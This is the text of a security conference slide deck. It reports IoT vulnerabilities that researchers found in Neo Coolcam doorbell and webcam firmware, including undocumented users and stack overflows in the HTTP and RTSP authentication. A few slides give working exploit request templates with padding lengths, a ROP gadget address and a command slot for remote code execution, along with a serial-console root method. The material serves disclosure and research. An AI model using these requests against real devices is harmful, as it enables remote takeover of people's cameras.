IoT – The gift that keeps on giving
Host:
Alex “Jay” Balan – Chief Security Researcher
[email protected] | @jaymzu
Contributors – [email protected]
Radu Alexandru Basaraba - [email protected]
Alexandru Lazar – [email protected]
Mihai Moldovan - [email protected]
2
3
4
5
• Chapter 1 – The crazy state of IoT
• Chapter 2 – From China with love
• First findings
• Quick crash course into IoT hacking
• Demo
• Chapter 3 – The gift that keeps on giving
6 CHAPTER 1: The crazy state of IoT
RENTED A CONNECTED CAR ONCE…
7
SMART EVERYTHING
8
Smart Portable fish finder
Smart lightbulb & WiFi repeater
Smart Lightbulb
Smart ThermostatSmart Yoga Mat
Smart Music Player
Smart Barbie doll
Smart Power Outlet
Smart Coffee Maker
IT TAKES A SPECIAL KIND OF CRAZY TO TRY THIS
9
THE MOST COMMON ISSUES
10
• Undocumented hardcoded passwords
• Weak or no encryption
• Command injection
• Very old services
• WiFi configuration hotspots
• Bad UX on Firmware updates
• Port forwarding / UPnP
• Device – cloud – mobile app cloud sync
• poor input validation => command injection
THE MOST DANGEROUS ISSUES
MOST IOT SECURITY PAPERS ARE FOCUSED ON PROXIMITY BASED ATTACKS
11
• MITM the Bluetooth key exchange
• Get shell on some device in your house
• Etc…
• Attacks that require proximity have their charm
MASS HACKS NEED MORE LOVE
12
IOT IS JUST HARDWARE + OS + APP (+ CLOUD)
13
wu-ftpd IIS5.0 RDPJoomla
app
WHY IS THAT A PROBLEM ?
14
• No standards or security reviews for 90% of what’s out there
• Each company builds their own app with almost no
experience with how security works
15
CHAPTER 2
FROM CHINA WITH LOVE
IDOORBELL & NEO COOLCAM
16
SETTING IT UP – STANDARD LINKSYS ROUTER
SETTING IT UP – SETUP FLOW
18
flow is identical for both the doorbell and webcam
FROM A PERFECTLY GOOD ROUTER
TO SWISS CHEESE
SHODAN SAYS THIS HAS GREAT POTENTIAL
AT THIS POINT WE WENT THROUGH THE USUAL FIRST STEPS
22
• Wireshark
• Mobile app unpacking
• Check for weak encryption
• Check webapp for various vectors
• Etc…
• We realized that we’ve become used to a number of stupid things
• …and cheered when we found things that should be common sense
• Encryption in cloud communication (yey!)
• No encryption on direct connections (boo!)
SO…
YOU SEE AN INPUT FIELD… YOU FUZZ IT
Sadly, the good folks at Neo Shenzhen decided not to let us have too much fun.
Crash on the first try…
The RTSP server didn’t crash with the same method, though (yet)
25
I’M A SIMPLE MAN. I SEE A CRASH, I GET AROUSED
HOOK-UP TO SERIAL
GREAT SUCCESS! NO CREDENTIALS THOUGH
GOT ROOT ?
Pause boot loader: pass init=/bin/bash to kernel
Use dumb shell to add telnetd to startup
FIRST FINDS – UNDOCUMENTED USERS
29
FIRST FINDS – AND THIS - ONE BINARY TO RULE THEM ALL(BECAUSE WHY NOT ?)
30
• Webserver
• RTSP server
• Authentication for webserver
• Authentication for RTSP
DEBUG TIME!
31
cp -r / /path/to/sdcard
HTTP AUTH
32
When checking auth at http://<ip>/?usr=<user>&pwd=<password>
libs_parsedata will copy the content of those two arguments onto the
stack without checking if they fit, resulting in an out of bound write
0x460 allocated on stack
HTTP AUTH
33
ASLR is enabled
However….
No PIE = it will always load at the same address
We’ll use ROP gadget at 0x0007EDD8
To put the address of the stack pointer
(which now contains our command) into R0
Then call the system function to execute our command
GET /?usr=<204bytes><command>&pwd=<328bytes><0xD8ED07> HTTP/1.1
* checksec.sh - http://www.trapkit.de/tools/checksec.html
THE “ALMIGHTY” EXPLOIT
34
RTSP
35
• Tried to fuzz user/pass again – didn’t get so lucky this time
• Back to basics…
The RTSP server uses digest authentication and it seems they
implemented it themselves… .poorly
field & value implied to have 256bytes (0x100) each
Unlimited sized strings scanned into field & value
RTSP EXPLOIT
36
Same binary – we’ll use the same gadget from http. The request
looks like this:
DESCRIBE rtsp://<IP>:554/ RTSP/1.0Authorization: Digest <296 bytes><command>=”<548 bytes><0xD8ED07>”
DEMO
37
20 YEARS AGO CALLED. ROOT SHELL BY PASSING 200 CHARS TO LOGIN RING A BELL TO ANYONE ?
38
FROM CHINA WITH LOVE - KEY TAKEAWAYS
39
• Setup flow requests a password change but there are 2
undocumented users that device owners don’t know exist
• A really lame overflow leads to RCE. Base system provides ASLR
but the app “architecture” decided it’d be a good idea to not use it
• Seriously, check & disable UPnP on your routers
• It’s hard to tell how many affected devices are in the wild since we
don’t know how many (other) vendors use this firmware but at this
point we’re looking at more than 200k
• RCE for other models will require adding other targets to the
exploit
THE GIFT THAT KEEPS ON GIVING
40
• We need a “security certification” system of sorts for IoT that looks
at more than “military grade encryption”
• We need to educate or otherwise “stimulate” the vendors to have a
proper incident response process and unattended update
mechanisms
• We need to educate the users to get to get tools that can handle the
security of their non-traditional devices. At the very least
vulnerability checkers
• There are vulnerabilities discovered in apps every day but at the
rate IoT is developing we’ll have stuff to talk about for ages
• IoT security papers is a low hanging fruit. Almost everything is not
only broken but also, sometimes, unfixable
• Focus on remote exploits and mass hacks since that’s what the bad
guys are going to focus on
Top Related